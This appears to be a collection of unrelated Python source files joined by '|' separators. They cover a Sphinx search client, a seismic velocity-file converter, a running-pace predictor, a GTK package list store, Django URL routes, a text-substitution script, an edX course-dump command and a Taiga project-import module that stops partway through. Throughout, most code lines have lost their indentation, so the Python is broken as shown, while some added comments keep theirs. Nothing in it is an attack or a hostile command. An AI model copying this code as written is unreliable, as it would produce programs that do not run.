assert ( isinstance ( query, str ) )
assert ( isinstance ( index, str ) )
assert ( isinstance ( hits, int ) )
# build request
req = [ pack ( '>L', len(query) ) + query ]
req.append ( pack ( '>L', len(index) ) + index )
req.append ( pack ( '>L', hits ) )
# connect, send query, get response
sock = self._Connect()
if not sock:
return None
req = ''.join(req)
length = len(req)
req = pack ( '>2HL', SEARCHD_COMMAND_KEYWORDS, VER_COMMAND_KEYWORDS, length ) + req
wrote = sock.send ( req )
response = self._GetResponse ( sock, VER_COMMAND_KEYWORDS )
if not response:
return None
# parse response
res = []
nwords = unpack ( '>L', response[0:4] )[0]
p = 4
max_ = len(response)
while nwords>0 and p<max_:
nwords -= 1
length = unpack ( '>L', response[p:p+4] )[0]
p += 4
tokenized = response[p:p+length]
p += length
length = unpack ( '>L', response[p:p+4] )[0]
p += 4
normalized = response[p:p+length]
p += length
entry = { 'tokenized':tokenized, 'normalized':normalized }
if hits:
entry['docs'], entry['hits'] = unpack ( '>2L', response[p:p+8] )
p += 8
res.append ( entry )
if nwords>0 or p>max_:
self._error = 'incomplete reply'
return None
return res
### persistent connections
def Open(self):
if self._socket:
self._error = 'already connected'
return None
server = self._Connect()
if not server:
return None
# command, command version = 0, body length = 4, body = 1
request = pack ( '>hhII', SEARCHD_COMMAND_PERSIST, 0, 4, 1 )
server.send ( request )
self._socket = server
return True
def Close(self):
if not self._socket:
self._error = 'not connected'
return
self._socket.close()
self._socket = None
def EscapeString(self, string):
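        # Escape characters that are special in the extended query syntax,
        # e.g. EscapeString('hello (world)') returns 'hello \(world\)'.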
return re.sub(r"([=\(\)|\-!@~\"&/\\\^\$\=])", r"\\\1", string)
def FlushAttributes(self):
sock = self._Connect()
if not sock:
return -1
request = pack ( '>hhI', SEARCHD_COMMAND_FLUSHATTRS, VER_COMMAND_FLUSHATTRS, 0 ) # cmd, ver, bodylen
sock.send ( request )
response = self._GetResponse ( sock, VER_COMMAND_FLUSHATTRS )
if not response or len(response)!=4:
self._error = 'unexpected response length'
return -1
tag = unpack ( '>L', response[0:4] )[0]
return tag
def AssertInt32 ( value ):
assert(isinstance(value, (int, long)))
    assert(value>=-2**31 and value<=2**31-1)
def AssertUInt32 ( value ):
assert(isinstance(value, (int, long)))
assert(value>=0 and value<=2**32-1)
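# Example usage -- a minimal sketch, assuming a searchd instance listening on
# localhost:9312 with an index named 'test1' (adjust host, port and index
# name to your setup):
if __name__ == '__main__':
    client = SphinxClient()
    client.SetServer('localhost', 9312)
    client.SetMatchMode(SPH_MATCH_EXTENDED2)
    result = client.Query('hello world', 'test1')
    if not result:
        print 'query failed: %s' % client.GetLastError()
    else:
        print 'found %s of %s matches' % (result['total'], result['total_found'])
        for match in result['matches']:
            print 'id=%s, weight=%s' % (match['id'], match['weight'])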
|
'''Converts 2D/3D velocity files from handvel.txt to handvel.rsf
- sfhandvel2rsf < handvel.txt o1=0 d1=.001 n1=3000 > handvel.rsf
- The program converts time samples from ms to s
- The rsf output file will have one trace per CMP location in
  handvel.txt. You need to interpolate between traces for a
  denser grid, e.g. using sfremap1
- This program uses sfspline for interpolation.
'''
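# Example input sketch (assumed from the parser below): one header line per
# CMP location ("HANDVEL <inline> <xline>" or "VFUNC <inline> <xline>")
# followed by time/velocity pairs, times in ms; lines starting with '*' are
# skipped as comments:
#
#   HANDVEL 1000 2000
#   0 1500  500 1800
#   1200 2100  2400 2600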
import sys, os, string, tempfile, collections, multiprocessing
import rsf.path, rsf.prog
import re
try:
    import subprocess
except ImportError:
    sys.stderr.write("subprocess module is needed\n")
    sys.exit(2)
import rsf.api as salah
basename=os.path.basename(sys.argv[0])
usage= '''
Name
%s
DESCRIPTION
Converts 2D/3D velocity files from handvel.txt to handvel.rsf
SYNOPSIS
 %s < handvel.txt o1=0 d1=.001 n1=3000 > handvel.rsf
PARAMETERS
float o1= origin of the first axis
float d1= sampling in the first axis
int n1= size of the first axis
COMMENTS:
-The program converts time samples from ms to s
 -The rsf output file will have one trace per CMP location in
  handvel.txt. You need to interpolate between traces for a
  denser grid, e.g. using sfremap1
 -This program uses sfspline default parameters. The program
  could possibly be enhanced to accept additional sfspline
  parameters.
 -The input file is not QCed, so check your input file
SOURCE
%s
''' %(basename,basename,sys.argv[0])
bindir = os.path.join(rsf.prog.RSFROOT,'bin')
sfcat = os.path.join(bindir,'sfcat')
sfrm = os.path.join(bindir,'sfrm')
sfinvbin1 = os.path.join(bindir,'sfinvbin1')
sfdd = os.path.join(bindir,'sfdd')
sfput = os.path.join(bindir,'sfput')
sfspline = os.path.join(bindir,'sfspline')
datapath = rsf.path.datapath().rstrip('/')
sftransp = os.path.join(bindir,'sftransp')
def myfunction(lock, vs, its, nx, x0, dx):
global sfcat, sfrm, sfinvbin1, sfdd, sfput, datapath,sfspline
vcmd='echo '
# open temp files
vd,vpath = tempfile.mkstemp(suffix=".rsf",dir=datapath,text=True)
tvd,tvpath = tempfile.mkstemp(suffix=".rsf",dir=datapath)
    # ensure there is a velocity sample at time o1
if float(its[0]) != o1:
t=o1
v=its[1]
# insert v then t
its.insert(0,v)
its.insert(0,t)
# create cmds for velocity file
for i in range(0,len(its),2):
# time samples are converted to seconds
vcmd=vcmd+ str(float(its[i])/1000.0)+" "+str(float(its[i+1]))+" "
vcmd= vcmd + '''n1=2 n2=%d data_format=ascii_float in=%s\
'''%((len(its)/2),vpath)
#print vcmd
#nx=n1
#dx=d1
#x0=o1
#time velocity command
tvcmd='''%s form=native | %s n1=%d o1=%f d1=%f fp=0,0\
'''%(sfdd,sfspline,nx,x0,dx)
# execute cmds
subprocess.call(vcmd,stdout=vd,shell=True)
os.lseek(vd,0,0)
#print tvcmd
subprocess.call(tvcmd,stdin=vd,stdout=tvd,shell=True)
# maintain a list of interpolated traces
#print vs
# close files
for k in [vd,tvd]:
os.close(k)
for k in [vpath]:
os.remove(k)
vs.append(tvpath)
return
if __name__ == "__main__":
mgr = multiprocessing.Manager()
vs = mgr.list()
par=salah.Par()
n1=par.int("n1") # size of the first axis
o1=par.float("o1") # origin of the first axis
d1=par.float("d1") # sampling in the first axis
#
if not (n1 or o1 or d1):
#sys.stderr.write(usage)
rsf.prog.selfdoc()
sys.exit(2)
if sys.stdout.isatty() or sys.stdin.isatty():
#sys.stderr.write(usage)
rsf.prog.selfdoc()
sys.exit(2)
inline=collections.OrderedDict()
loc=collections.OrderedDict()
i=None
x=None
for line in sys.stdin:
line=line.strip()
if re.match(r"^\*", line):
continue
        if re.match(r"^HANDVEL|^VFUNC", line):
if 3 != len(line.split()):
sys.stderr.write("wrong input file format\n")
sys.stderr.write("%s\n"%(line))
sys.exit(2)
# get inline and xline
i=line.split()[1]
x=line.split()[2]
if i in inline.keys():
inline[i].append(x)
else:
inline[i]=[x]
if (i,x) in loc.keys():
sys.stderr.write("duplicate location %s,%s\n"%(i,x))
sys.exit(2)
else:
loc[i,x]=[]
else:
loc[i,x]= loc[i,x] + line.split()
#for y in inline.keys():
#for x,v in inline[y].items():
#print y
#print inline[y]
# compute o2, d2, n2, o3, d3, and n3
n2=len(inline.keys())
d2=1. if n2==1 else float(inline.keys()[1])-float(inline.keys()[0])
o2=inline.keys()[0]
n3=len(inline[o2])
d3=1. if n3==1 else float(inline[o2][1])-float(inline[o2][0])
o3=inline[o2][0]
lock=multiprocessing.Lock()
#print "o2="+str(o2)+" d2="+str(d2)+" n2="+str(n2)+" o3="+str(o3)+" d3="+str(d3)+" n3="+str(n3)
jobs=[]
for y in loc.keys():
#myfunction(loc[y],n1,o1,d1)
p = multiprocessing.Process(target=myfunction, args=(lock,vs,loc[y],n1,o1,d1))
jobs.append(p)
p.start()
#print len(jobs)
for job in jobs:
job.join()
    # concatenate traces along the second axis
cmd='''
%s axis=2 %s | %s n3=%d o3=%f d3=%f n2=%d o2=%f d2=%f label1=time label2=xline label3=inline| %s plane=23
'''%(sfcat,' '.join(vs),sfput,n2,float(o2),d2,n3,float(o3),d3,sftransp)
#cmd='%s axis=2 %s'%(sfcat,' '.join(vs))
#print cmd
subprocess.call(cmd,stdout=sys.stdout,shell=True)
# removing temp files of individual traces
for tmp in vs:
try:
subprocess.call(sfrm + ' ' + tmp,shell=True)
except:
pass
sys.exit(0)
|
from find_it import find_closest
from tm2secs2tm import time2secs, secs2time
def find_nearest_time(look_for, target_data):
what = time2secs(look_for)
where = [time2secs(t) for t in target_data]
res = find_closest(what, where)
return(secs2time(res))
row_data = {}
with open('PaceData.csv') as paces:
column_headings = paces.readline().strip().split(',')
column_headings.pop(0)
for each_line in paces:
row = each_line.strip().split(',')
row_label = row.pop(0)
inner_dict = {}
for i in range(len(column_headings)):
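            # NOTE: the mapping is deliberately inverted -- each recorded time
            # maps to its column heading, so times can be looked up as keys.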
inner_dict[row[i]] = column_headings[i]
row_data[row_label] = inner_dict
distance_run = input('Enter the distance attempted: ')
recorded_time = input('Enter the recorded time: ')
predicted_distance = input('Enter the distance you want a prediction for: ')
closest_time = find_nearest_time(recorded_time, row_data[distance_run])
closest_column_heading = row_data[distance_run][closest_time]
prediction = [k for k in row_data[predicted_distance].keys()
if row_data[predicted_distance][k] == closest_column_heading]
print('The predicted time running ' + predicted_distance + ' is: ' + prediction[0] + '.')
|
"""
Copyright (C) 2012 Fabio Erculiani
Authors:
Fabio Erculiani
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; version 3.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
from threading import Lock, Semaphore
from gi.repository import Gtk, GLib, GObject, GdkPixbuf
from rigo.enums import Icons
from rigo.models.application import Application, ApplicationMetadata
from entropy.const import const_debug_write, const_debug_enabled
class AppListStore(Gtk.ListStore):
# column types
COL_TYPES = (GObject.TYPE_PYOBJECT,)
# column id
COL_ROW_DATA = 0
# default icon size returned by Application.get_icon()
ICON_SIZE = 48
_MISSING_ICON = None
_MISSING_ICON_MUTEX = Lock()
_ICON_CACHE = {}
__gsignals__ = {
# Redraw signal, requesting UI update
# for given pkg_match object
"redraw-request" : (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_PYOBJECT,),
),
# signal that all the elements in the List
# have vanished.
"all-vanished" : (GObject.SignalFlags.RUN_LAST,
None,
tuple(),
),
}
def __init__(self, entropy_client, entropy_ws, rigo_service,
view, icons):
Gtk.ListStore.__init__(self)
self._view = view
self._entropy = entropy_client
self._entropy_ws = entropy_ws
self._service = rigo_service
self._icons = icons
self.set_column_types(self.COL_TYPES)
        # Start the Entropy Package Metadata daemon
ApplicationMetadata.start()
def clear(self):
"""
Clear ListStore content (and Icon Cache).
"""
outcome = Gtk.ListStore.clear(self)
AppListStore._ICON_CACHE.clear()
return outcome
@property
def _missing_icon(self):
"""
Return the missing icon Gtk.Image() if needed.
"""
if AppListStore._MISSING_ICON is not None:
return AppListStore._MISSING_ICON
with AppListStore._MISSING_ICON_MUTEX:
if AppListStore._MISSING_ICON is not None:
return AppListStore._MISSING_ICON
_missing_icon = self._icons.load_icon(
Icons.MISSING_APP, AppListStore.ICON_SIZE, 0)
AppListStore._MISSING_ICON = _missing_icon
return _missing_icon
def visible(self, pkg_match):
"""
Returns whether Application (through pkg_match) is still
visible in the TreeView.
This method shall be Thread safe.
"""
s_data = {
'sem': Semaphore(0),
'res': None,
}
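        # The TreeView may only be touched from the GTK main loop, so the
        # actual check is scheduled with GLib.idle_add() and this thread
        # blocks on the semaphore until the idle callback stores its result.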
def _get_visible(data):
res = False
try:
vis_data = self._view.get_visible_range()
if vis_data is None:
return
if len(vis_data) == 2:
# Gtk 3.4
valid_paths = True
start_path, end_path = vis_data
else:
                    # Gtk < 3.4
valid_paths, start_path, end_path = vis_data
if not valid_paths:
return
path = start_path
while path <= end_path:
path_iter = self.get_iter(path)
if self.iter_is_valid(path_iter):
visible_pkg_match = self.get_value(path_iter, 0)
if visible_pkg_match == pkg_match:
res = True
return
path.next()
res = False
finally:
data['res'] = res
data['sem'].release()
GLib.idle_add(_get_visible, s_data)
s_data['sem'].acquire()
return s_data['res']
def get_icon(self, app, cached=False):
pkg_match = app.get_details().pkg
cached_icon = AppListStore._ICON_CACHE.get(pkg_match)
if cached_icon is not None:
return cached_icon
if cached:
# then return the default icon
return self._missing_icon
def _still_visible():
return self.visible(pkg_match)
icon, cache_hit = app.get_icon(
_still_visible_cb=_still_visible,
cached=cached)
if const_debug_enabled():
const_debug_write(__name__,
"get_icon({%s, %s}) = %s, hit: %s" % (
(pkg_match, app.name, icon, cache_hit,)))
if icon is None:
if cache_hit:
# this means that there is no icon for package
# and so we should not keep bugging underlying
# layers with requests
AppListStore._ICON_CACHE[pkg_match] = self._missing_icon
return self._missing_icon
icon_path = icon.local_document()
icon_path_exists = False
if icon_path:
icon_path_exists = os.path.isfile(icon_path)
if not icon_path_exists:
return self._missing_icon
try:
img = Gtk.Image.new_from_file(icon_path)
except GObject.GError:
return self._missing_icon
img_buf = img.get_pixbuf()
if img_buf is None:
            # invalid image data
return self._missing_icon
w, h = img_buf.get_width(), img_buf.get_height()
del img_buf
del img
if w < 1:
# not legit
return self._missing_icon
width = AppListStore.ICON_SIZE
height = width * h / w
try:
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(
icon_path, width, height)
except GObject.GError:
try:
os.remove(icon_path)
except OSError:
pass
return self._missing_icon
AppListStore._ICON_CACHE[pkg_match] = pixbuf
return pixbuf
def _vanished_callback(self, app):
"""
Remove elements that are marked as "vanished" due
to unavailable metadata.
"""
def _remove(_app):
pkg_match = _app.get_details().pkg
vis_data = self._view.get_visible_range()
if vis_data is None:
return
if len(vis_data) == 2:
# Gtk 3.4
valid_paths = True
start_path, end_path = vis_data
else:
                # Gtk < 3.4
valid_paths, start_path, end_path = vis_data
if not valid_paths:
return
path = start_path
while path <= end_path:
path_iter = self.get_iter(path)
if self.iter_is_valid(path_iter):
visible_pkg_match = self.get_value(path_iter, 0)
if visible_pkg_match == pkg_match:
self.remove(path_iter)
if len(self) == 0:
self.emit("all-vanished")
return
path.next()
GLib.idle_add(_remove, app)
def get_application(self, pkg_match):
def _ui_redraw_callback(*args):
if const_debug_enabled():
const_debug_write(__name__,
"_ui_redraw_callback()")
GLib.idle_add(self.emit, "redraw-request", pkg_match)
app = Application(self._entropy, self._entropy_ws,
self._service, pkg_match,
redraw_callback=_ui_redraw_callback,
vanished_callback=self._vanished_callback)
return app
|
from django.conf.urls import patterns, url
from .settings import EMAIL_CONFIRMATION
urlpatterns = patterns('nodeshot.community.profiles.views', # noqa
url(r'^profiles/$', 'profile_list', name='api_profile_list'),
url(r'^profiles/(?P<username>[-.\w]+)/$', 'profile_detail', name='api_profile_detail'),
url(r'^profiles/(?P<username>[-.\w]+)/nodes/$', 'user_nodes', name='api_user_nodes'),
url(r'^profiles/(?P<username>[-.\w]+)/social-links/$', 'user_social_links_list', name='api_user_social_links_list'),
url(r'^profiles/(?P<username>[-.\w]+)/social-links/(?P<pk>[0-9]+)/$', 'user_social_links_detail', name='api_user_social_links_detail'),
url(r'^account/$', 'account_detail', name='api_account_detail'),
url(r'^account/login/$', 'account_login', name='api_account_login'),
url(r'^account/logout/$', 'account_logout', name='api_account_logout'),
url(r'^account/password/$', 'account_password_change', name='api_account_password_change'),
url(r'^account/password/reset/$', 'account_password_reset_request_key', name='api_account_password_reset_request_key'),
url(r'^account/password/reset/(?P<uidb36>[0-9A-Za-z]+)-(?P<key>.+)/$', 'account_password_reset_from_key', name='api_account_password_reset_from_key'),
)
if EMAIL_CONFIRMATION:
urlpatterns += patterns('nodeshot.community.profiles.views', # noqa
url(r'^account/email/$', 'account_email_list', name='api_account_email_list'),
url(r'^account/email/(?P<pk>[0-9]+)/$', 'account_email_detail', name='api_account_email_detail'),
url(r'^account/email/(?P<pk>[0-9]+)/resend-confirmation/$', 'account_email_resend_confirmation', name='api_account_email_resend_confirmation'),
)
|
import os, sys, getopt, tempfile
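# Usage sketch (inferred from the getopt spec below; the script name is
# hypothetical):
#   python subst.py -p PATTERN -r REPL_FILE [-o OUT_FILE] [-s] TARGET_FILE
# Replaces every occurrence of PATTERN in TARGET_FILE with the contents of
# REPL_FILE; -s strips surrounding whitespace from the replacement; without
# -o the target file is rewritten in place through a temp file.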
opts, args = getopt.getopt(sys.argv[1:], "p:r:o:s")
pattern = replFile = outFile = ''
strip = False
for o, a in opts:
if '-p' == o:
pattern = a
elif '-r' == o:
replFile = a
elif '-o' == o:
outFile = a
elif '-s' == o:
strip = True
if args and pattern and replFile and os.path.isfile(replFile):
subst = open(replFile, "r").read()
if strip:
subst = subst.strip()
fpath = args[0]
if os.path.isfile(fpath):
fString = open(fpath, "r").read()
fString = fString.replace(pattern, subst)
if outFile:
open(outFile, "w+").write(fString)
else:
h, tmpFile = tempfile.mkstemp('', 'tmp', os.path.dirname(fpath))
os.write(h, fString)
os.close(h)
os.rename(fpath, fpath + '.tmp')
os.rename(tmpFile, fpath)
os.unlink(fpath + '.tmp')
|
"""
Dump the structure of a course as a JSON object.
The resulting JSON object has one entry for each module in the course:
{
"$module_url": {
"category": "$module_category",
"children": [$module_children_urls... ],
"metadata": {$module_metadata}
},
"$module_url": ....
...
}
"""
import json
from textwrap import dedent
from django.core.management.base import BaseCommand, CommandError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from xblock.fields import Scope
from xblock_discussion import DiscussionXBlock
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.inheritance import compute_inherited_metadata, own_metadata
FILTER_LIST = ['xml_attributes']
INHERITED_FILTER_LIST = ['children', 'xml_attributes']
class Command(BaseCommand): # lint-amnesty, pylint: disable=missing-class-docstring
help = dedent(__doc__).strip()
def add_arguments(self, parser):
parser.add_argument('course_id',
help='specifies the course to dump')
parser.add_argument('--modulestore',
default='default',
help='name of the modulestore')
parser.add_argument('--inherited',
action='store_true',
help='include inherited metadata')
parser.add_argument('--inherited_defaults',
action='store_true',
help='include default values of inherited metadata')
def handle(self, *args, **options):
# Get the modulestore
store = modulestore()
# Get the course data
try:
course_key = CourseKey.from_string(options['course_id'])
except InvalidKeyError:
raise CommandError("Invalid course_id") # lint-amnesty, pylint: disable=raise-missing-from
course = store.get_course(course_key)
if course is None:
raise CommandError("Invalid course_id")
# Precompute inherited metadata at the course level, if needed:
if options['inherited']:
compute_inherited_metadata(course)
# Convert course data to dictionary and dump it as JSON to stdout
info = dump_module(course, inherited=options['inherited'], defaults=options['inherited_defaults'])
return json.dumps(info, indent=2, sort_keys=True, default=str)
def dump_module(module, destination=None, inherited=False, defaults=False):
"""
Add the module and all its children to the destination dictionary in
as a flat structure.
"""
destination = destination if destination else {}
items = own_metadata(module)
# HACK: add discussion ids to list of items to export (AN-6696)
if isinstance(module, DiscussionXBlock) and 'discussion_id' not in items:
items['discussion_id'] = module.discussion_id
filtered_metadata = {k: v for k, v in items.items() if k not in FILTER_LIST}
destination[str(module.location)] = {
'category': module.location.block_type,
'children': [str(child) for child in getattr(module, 'children', [])],
'metadata': filtered_metadata,
}
if inherited:
# When calculating inherited metadata, don't include existing
# locally-defined metadata
inherited_metadata_filter_list = list(filtered_metadata.keys())
inherited_metadata_filter_list.extend(INHERITED_FILTER_LIST)
def is_inherited(field):
if field.name in inherited_metadata_filter_list:
return False
elif field.scope != Scope.settings:
return False
elif defaults:
return True
else:
return field.values != field.default
inherited_metadata = {field.name: field.read_json(module) for field in module.fields.values() if is_inherited(field)} # lint-amnesty, pylint: disable=line-too-long
destination[str(module.location)]['inherited_metadata'] = inherited_metadata
for child in module.get_children():
dump_module(child, destination, inherited, defaults)
return destination
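# Example invocation -- a sketch, assuming this module is installed as the
# 'dump_course_structure' management command (the name is inferred from
# convention) and that the course id exists in the default modulestore:
#
#   python manage.py dump_course_structure 'course-v1:edX+DemoX+Demo_Course' --inherited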
|
import uuid
import os.path as path
from unidecode import unidecode
from django.template.defaultfilters import slugify
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from taiga.projects.history.services import make_key_from_model_object, take_snapshot
from taiga.timeline.service import build_project_namespace
from taiga.projects.references import sequences as seq
from taiga.projects.references import models as refs
from taiga.projects.userstories.models import RolePoints
from taiga.projects.services import find_invited_user
from . import serializers
_errors_log = {}
def get_errors(clear=True):
_errors = _errors_log.copy()
if clear:
_errors_log.clear()
return _errors
def add_errors(section, errors):
if section in _errors_log:
_errors_log[section].append(errors)
else:
_errors_log[section] = [errors]
def project_to_dict(project):
return serializers.ProjectExportSerializer(project).data
def store_project(data):
project_data = {}
for key, value in data.items():
excluded_fields = [
"default_points", "default_us_status", "default_task_status",
"default_priority", "default_severity", "default_issue_status",
"default_issue_type", "memberships", "points", "us_statuses",
"task_statuses", "issue_statuses", "priorities", "severities",
"issue_types", "userstorycustomattributes", "taskcustomattributes",
"issuecustomattributes", "roles", "milestones", "wiki_pages",
"wiki_links", "notify_policies", "user_stories", "issues", "tasks",
]
if key not in excluded_fields:
project_data[key] = value
serialized = serializers.ProjectExportSerializer(data=project_data)
if serialized.is_valid():
serialized.object._importing = True
serialized.object.save()
serialized.save_watchers()
return serialized
add_errors("project", serialized.errors)
return None
def _store_choice(project, data, field, serializer):
serialized = serializer(data=data)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized.object
add_errors(field, serialized.errors)
return None
def store_choices(project, data, field, serializer):
result = []
for choice_data in data.get(field, []):
result.append(_store_choice(project, choice_data, field, serializer))
return result
def _store_custom_attribute(project, data, field, serializer):
serialized = serializer(data=data)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized.object
add_errors(field, serialized.errors)
return None
def store_custom_attributes(project, data, field, serializer):
result = []
for custom_attribute_data in data.get(field, []):
result.append(_store_custom_attribute(project, custom_attribute_data, field, serializer))
return result
def store_custom_attributes_values(obj, data_values, obj_field, serializer_class):
data = {
obj_field: obj.id,
"attributes_values": data_values,
}
try:
custom_attributes_values = obj.custom_attributes_values
serializer = serializer_class(custom_attributes_values, data=data)
except ObjectDoesNotExist:
serializer = serializer_class(data=data)
if serializer.is_valid():
serializer.save()
return serializer
add_errors("custom_attributes_values", serializer.errors)
return None
def _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes, values):
ret = {}
for attr in custom_attributes:
value = values.get(attr["name"], None)
if value is not None:
ret[str(attr["id"])] = value
return ret
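# Example: with custom_attributes = [{"id": 1, "name": "Severity"}] and
# values = {"Severity": "high"}, this returns {"1": "high"}.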
def store_role(project, role):
serialized = serializers.RoleExportSerializer(data=role)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized
add_errors("roles", serialized.errors)
return None
def store_roles(project, data):
results = []
for role in data.get("roles", []):
serialized = store_role(project, role)
if serialized:
results.append(serialized)
return results
def store_default_choices(project, data):
def helper(project, field, related, data):
if field in data:
value = related.all().get(name=data[field])
else:
value = related.all().first()
setattr(project, field, value)
helper(project, "default_points", project.points, data)
helper(project, "default_issue_type", project.issue_types, data)
helper(project, "default_issue_status", project.issue_statuses, data)
helper(project, "default_us_status", project.us_statuses, data)
helper(project, "default_task_status", project.task_statuses, data)
helper(project, "default_priority", project.priorities, data)
helper(project, "default_severity", project.severities, data)
project._importing = True
project.save()
def store_membership(project, membership):
serialized = serializers.MembershipExportSerializer(data=membership, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.object.token = str(uuid.uuid1())
serialized.object.user = find_invited_user(serialized.object.email,
default=serialized.object.user)
serialized.save()
return serialized
add_errors("memberships", serialized.errors)
return None
def store_memberships(project, data):
results = []
for membership in data.get("memberships", []):
results.append(store_membership(project, membership))
return results
def store_task(project, data):
if "status" not in data and project.default_task_status:
data["status"] = project.default_task_status.name
serialized = serializers.TaskExportSerializer(data=data, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
if serialized.object.ref:
sequence_name = refs.make_sequence_name(project)
if not seq.exists(sequence_name):
seq.create(sequence_name)
seq.set_max(sequence_name, serialized.object.ref)
else:
serialized.object.ref, _ = refs.make_reference(serialized.object, project)
serialized.object.save()
for task_attachment in data.get("attachments", []):
store_attachment(project, serialized.object, task_attachment)
history_entries = data.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
custom_attributes_values = data.get("custom_attributes_values", None)
if custom_attributes_values:
custom_attributes = serialized.object.project.taskcustomattributes.all().values('id', 'name')
custom_attributes_values = _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes,
custom_attributes_values)
store_custom_attributes_values(serialized.object, custom_attributes_values,
"task", serializers.TaskCustomAttributesValuesExportSerializer)
return serialized
add_errors("tasks", serialized.errors)
return None
def store_milestone(project, milestone):
serialized = serializers.MilestoneExportSerializer(data=milestone, project=project)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
serialized.save_watchers()
for task_without_us in milestone.get("tasks_without_us", []):
task_without_us["user_story"] = None
store_task(project, task_without_us)
return serialized
add_errors("milestones", serialized.errors)
return None
def store_attachment(project, obj, attachment):
serialized = serializers.AttachmentExportSerializer(data=attachment)
if serialized.is_valid():
serialized.object.content_type = ContentType.objects.get_for_model(obj.__class__)
serialized.object.object_id = obj.id
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object.size = serialized.object.attached_file.size
serialized.object.name = path.basename(serialized.object.attached_file.name)
serialized.save()
return serialized
add_errors("attachments", serialized.errors)
return serialized
def store_timeline_entry(project, timeline):
serialized = serializers.TimelineExportSerializer(data=timeline, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
serialized.object.namespace = build_project_namespace(project)
serialized.object.object_id = project.id
serialized.object._importing = True
serialized.save()
return serialized
add_errors("timeline", serialized.errors)
return serialized
def store_history(project, obj, history):
serialized = serializers.HistoryExportSerializer(data=history, context={"project": project})
if serialized.is_valid():
serialized.object.key = make_key_from_model_object(obj)
if serialized.object.diff is None:
serialized.object.diff = []
serialized.object._importing = True
serialized.save()
return serialized
add_errors("history", serialized.errors)
return serialized
def store_wiki_page(project, wiki_page):
wiki_page["slug"] = slugify(unidecode(wiki_page.get("slug", "")))
serialized = serializers.WikiPageExportSerializer(data=wiki_page)
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
for attachment in wiki_page.get("attachments", []):
store_attachment(project, serialized.object, attachment)
history_entries = wiki_page.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
return serialized
add_errors("wiki_pages", serialized.errors)
return None
def store_wiki_link(project, wiki_link):
serialized = serializers.WikiLinkExportSerializer(data=wiki_link)
if serialized.is_valid():
serialized.object.project = project
serialized.object._importing = True
serialized.save()
return serialized
add_errors("wiki_links", serialized.errors)
return None
def store_role_point(project, us, role_point):
serialized = serializers.RolePointsExportSerializer(data=role_point, context={"project": project})
if serialized.is_valid():
try:
existing_role_point = us.role_points.get(role=serialized.object.role)
existing_role_point.points = serialized.object.points
existing_role_point.save()
return existing_role_point
except RolePoints.DoesNotExist:
serialized.object.user_story = us
serialized.save()
return serialized.object
add_errors("role_points", serialized.errors)
return None
def store_user_story(project, data):
if "status" not in data and project.default_us_status:
data["status"] = project.default_us_status.name
us_data = {key: value for key, value in data.items() if key not in ["role_points", "custom_attributes_values"]}
serialized = serializers.UserStoryExportSerializer(data=us_data, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
if serialized.object.ref:
sequence_name = refs.make_sequence_name(project)
if not seq.exists(sequence_name):
seq.create(sequence_name)
seq.set_max(sequence_name, serialized.object.ref)
else:
serialized.object.ref, _ = refs.make_reference(serialized.object, project)
serialized.object.save()
for us_attachment in data.get("attachments", []):
store_attachment(project, serialized.object, us_attachment)
for role_point in data.get("role_points", []):
store_role_point(project, serialized.object, role_point)
history_entries = data.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
custom_attributes_values = data.get("custom_attributes_values", None)
if custom_attributes_values:
custom_attributes = serialized.object.project.userstorycustomattributes.all().values('id', 'name')
custom_attributes_values = _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes,
custom_attributes_values)
store_custom_attributes_values(serialized.object, custom_attributes_values,
"user_story", serializers.UserStoryCustomAttributesValuesExportSerializer)
return serialized
add_errors("user_stories", serialized.errors)
return None
def store_issue(project, data):
    if "type" not in data and project.default_issue_type:
        data["type"] = project.default_issue_type.name
    if "status" not in data and project.default_issue_status:
        data["status"] = project.default_issue_status.name
    if "priority" not in data and project.default_priority:
        data["priority"] = project.default_priority.name
    if "severity" not in data and project.default_severity:
        data["severity"] = project.default_severity.name
    # build the serializer only after the default fields have been filled in
    serialized = serializers.IssueExportSerializer(data=data, context={"project": project})
if serialized.is_valid():
serialized.object.project = project
if serialized.object.owner is None:
serialized.object.owner = serialized.object.project.owner
serialized.object._importing = True
serialized.object._not_notify = True
serialized.save()
serialized.save_watchers()
if serialized.object.ref:
sequence_name = refs.make_sequence_name(project)
